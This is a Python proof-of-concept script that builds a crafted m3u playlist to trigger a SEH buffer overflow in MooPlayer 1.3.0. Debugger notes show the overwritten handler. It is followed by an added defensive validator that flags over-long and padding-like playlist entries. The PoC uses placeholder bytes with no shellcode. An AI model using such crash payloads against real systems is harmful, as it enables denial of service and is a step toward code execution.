#!/usr/bin/env python
##########################################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow POC
# Date Discovered: 09-02-2015
# Exploit Author: Samandeep Singh (@samanL33T)
# Vulnerable Software: Moo player 1.3.0
# Version: 1.3.0
# Tested On: Windows XP SP3, Win 7 x86.
##########################################################################################
# -----------------------------------NOTES-----------------------------------------------
##########################################################################################
# After the execution of the POC, the SEH chain looks like this:
#   01DDF92C ntdll.76FF71CD
#   01DDFF5C 43434343
#   42424242 *** CORRUPT ENTRY***
#
# And the stack:
#   01DDFF44 41414141 AAAA
#   01DDFF48 41414141 AAAA
#   01DDFF4C 41414141 AAAA
#   01DDFF50 41414141 AAAA
#   01DDFF54 41414141 AAAA
#   01DDFF58 41414141 AAAA
#   01DDFF5C 42424242 BBBB Pointer to next SEH record
#   01DDFF60 43434343 CCCC SE handler
#   01DDFF64 00000000 …
#   01DDFF68 44444444 DDDD
#   01DDFF6C 44444444 DDDD
#   01DDFF70 44444444 DDDD
#
# And the registers:
#   EAX 00000000
#   ECX 43434343
#   EDX 76FF71CD ntdll.76FF71CD
#   EBX 00000000
#   ESP 01DDF918
#   EBP 01DDF938
#   ESI 00000000
#   EDI 00000000
#   EIP 43434343
head = "http://"
buffer = 10000                          # total size of the generated payload
junk = "\x41" * 264                     # 'A' padding up to the SEH record
nseh = "\x42" * 4                       # 'B' lands in the next-SEH pointer
seh = "\x43" * 4                        # 'C' lands in the SE handler field
poc = head + junk + nseh + seh
junk1 = "\x44" * (buffer - len(poc))    # 'D' filler after the handler
poc += junk1
file = "mooplay_poc.m3u"
# Note that head is prepended a second time here (once inside poc, once below).
with open(file, "w") as f:
    f.write(head + poc)
# Samandeep Singh - @samanL33T
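The notes above show the SEH record being overwritten by a single playlist entry of ten thousand bytes, made of long runs of one repeated character. The following defensive validator is an added example, not part of the original PoC or of MooPlayer: it parses an m3u payload and rejects entries shaped like the crash file, either because an entry is longer than a bound or because it consists of padding-like runs of one byte. The thresholds `MAX_ENTRY_LEN` and `MAX_BYTE_RUN`, the `example.invalid` URL and the sample playlists are assumptions constructed for illustration, not MooPlayer constants or files from the page.

```python
#!/usr/bin/env python3
# Added defensive example (not part of the original PoC): a minimal m3u
# playlist validator that refuses entries shaped like the crash file above.
# The limits are assumptions chosen for illustration, not MooPlayer constants.

MAX_ENTRY_LEN = 260   # assumption: longest playlist entry a player should accept
MAX_BYTE_RUN = 64     # assumption: longest run of one repeated byte in a real path/URL


def parse_m3u(data):
    """Return the playlist entries (non-empty lines not starting with '#') as bytes."""
    entries = []
    for raw in data.splitlines():
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue  # blank line or an #EXTM3U / #EXTINF directive
        entries.append(line)
    return entries


def longest_byte_run(entry):
    """Length of the longest run of one repeated byte in entry (0 for empty input)."""
    best = run = 0
    prev = None
    for b in entry:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def suspicious_entries(data, max_len=MAX_ENTRY_LEN, max_run=MAX_BYTE_RUN):
    """Return (index, reason) for every entry a hardened loader should reject."""
    findings = []
    for i, entry in enumerate(parse_m3u(data)):
        if len(entry) > max_len:
            findings.append((i, "entry length %d exceeds %d" % (len(entry), max_len)))
        else:
            run = longest_byte_run(entry)
            if run > max_run:
                findings.append((i, "padding-like run of %d identical bytes" % run))
    return findings


def accepted_entries(data, **limits):
    """Entries that pass both checks, i.e. what a cautious player would load."""
    bad = {i for i, _ in suspicious_entries(data, **limits)}
    return [e for i, e in enumerate(parse_m3u(data)) if i not in bad]


# Constructed sample inputs (not files from the original page).
BENIGN = b"#EXTM3U\r\n#EXTINF:123,Sample\r\nhttp://example.invalid/track.mp3\r\n"
# Same shape as the PoC file: header, 264 'A's, 4 'B's, 4 'C's, then 'D' filler
# (filler shortened so the sample stays small).
CRASH_LIKE = b"http://" + b"\x41" * 264 + b"\x42" * 4 + b"\x43" * 4 + b"\x44" * 1000


if __name__ == "__main__":
    for name, data in (("benign", BENIGN), ("crash-like", CRASH_LIKE)):
        print(name, "->", suspicious_entries(data) or "no findings")
```

The length check alone would miss a short entry built from repeated bytes, which is why the run check is applied to entries that pass it; a real loader would additionally reject entries it cannot decode as a path or URL before handing them to a fixed-size buffer.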